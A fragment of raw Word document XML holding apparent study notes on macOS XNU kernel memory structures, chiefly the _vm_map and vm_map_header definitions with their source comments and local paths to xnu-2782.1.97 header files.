          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hv_task_target</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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hypervisor virtual machine object associated with this task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color w:val="008000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* HYPERVISOR */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7195" w:rsidRPr="006F7195" w:rsidRDefault="006F7195" w:rsidP="006F7195">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7195" w:rsidRPr="00FA2766" w:rsidRDefault="006F7195" w:rsidP="00FA2766">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA2766" w:rsidRDefault="00955822" w:rsidP="00FA2766">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc445313251"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Memory map</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="00026826" w:rsidRDefault="00DF0799" w:rsidP="00026826">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc445313252"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">vm </w:t>
      </w:r>
      <w:r w:rsidR="0044540C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_map_entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>task.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next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC"/>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC"/>
    <w:p w:rsidR="00026826" w:rsidRPr="000A21FB" w:rsidRDefault="0044540C" w:rsidP="00026826">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A21FB" w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A21FB" w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\mach\vm_types.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044540C" w:rsidRDefault="0044540C" w:rsidP="0044540C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>typedef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> _vm_map      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_map_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="0044540C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\vm\vm_map.h</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Type:       vm_map_t [exported; contents invisible]</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Description:</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An address map -- a directory relating valid</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regions of a task's address space to the corresponding</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virtual memory objects.</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Implementation:</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Maps are doubly-linked lists of map entries, sorted</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by address.  One hint is used to start</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searches again from the last successful search,</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insertion, or removal.  Another hint is used to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A21FB" w:rsidRPr="000A21FB" w:rsidRDefault="000A21FB" w:rsidP="000A21FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> *      quickly find free space.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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0080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> _vm_map </w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</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lck_rw_t            lock</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map lock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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vm_map_header    </w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hdr</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Map entry header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define</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> min_offset      hdr</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>links</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">start </w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* start of rang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lastRenderedPageBreak/>
        <w:t>#define</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> max_offset      hdr</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>links</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">end   </w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* end of rang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define</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> highest_entry_end   hdr</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>highest_entry_end_addr</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pmap_t          pmap</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Physical map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vm_map_size_t       size</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virtual siz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vm_map_size_t       user_wire_limit</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* rlimit on user locked memory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vm_map_size_t       user_wire_size</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current size of user locked memory in this map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ref_count</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Reference count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if</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TASK_SWAPPER</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res_count</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Residence count (swap)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sw_state</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Swap stat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endif</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TASK_SWAPPER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decl_lck_mtx_data</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(,</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> s_lock</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Lock ref, res fields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lck_mtx_ext_t       s_lock_ext</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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vm_map_entry_t      hint</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hint for quick lookups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vm_map_entry_t      first_free</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First free space hint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unsigned</w:t>
      </w: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wait_for_space</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Should callers wait for spac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wiring_required</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All memory wired?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no_zero_fill</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No zero fill absent pages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mapped_in_other_pmaps</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has this submap been mapped in maps that use a different pmap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switch_protect</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Protect map from write faults while switched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disable_vmentry_reuse</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All vm entries should keep using newer and higher addresses in the map */</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* boolean_t */</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     map_disallow_data_exec</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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Disallow execution from data pages on exec-permissive architectures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reserved */</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      pad</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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unsigned</w:t>
      </w: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timestamp</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Version number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unsigned</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        color_rr</w:t>
      </w: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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* next color (not protected by a lock) */</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIG_FREEZE</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w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default_freezer_handle</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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color w:val="008000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    boolean_t       jit_entry_exists</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A21FB" w:rsidRPr="000A21FB" w:rsidRDefault="000A21FB" w:rsidP="000A21FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000A21FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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Type:       struct vm_map_header</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Description:</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Header for a vm_map and a vm_map_copy.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vm map header</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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header </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links </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>links</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first, last, min, max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int</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
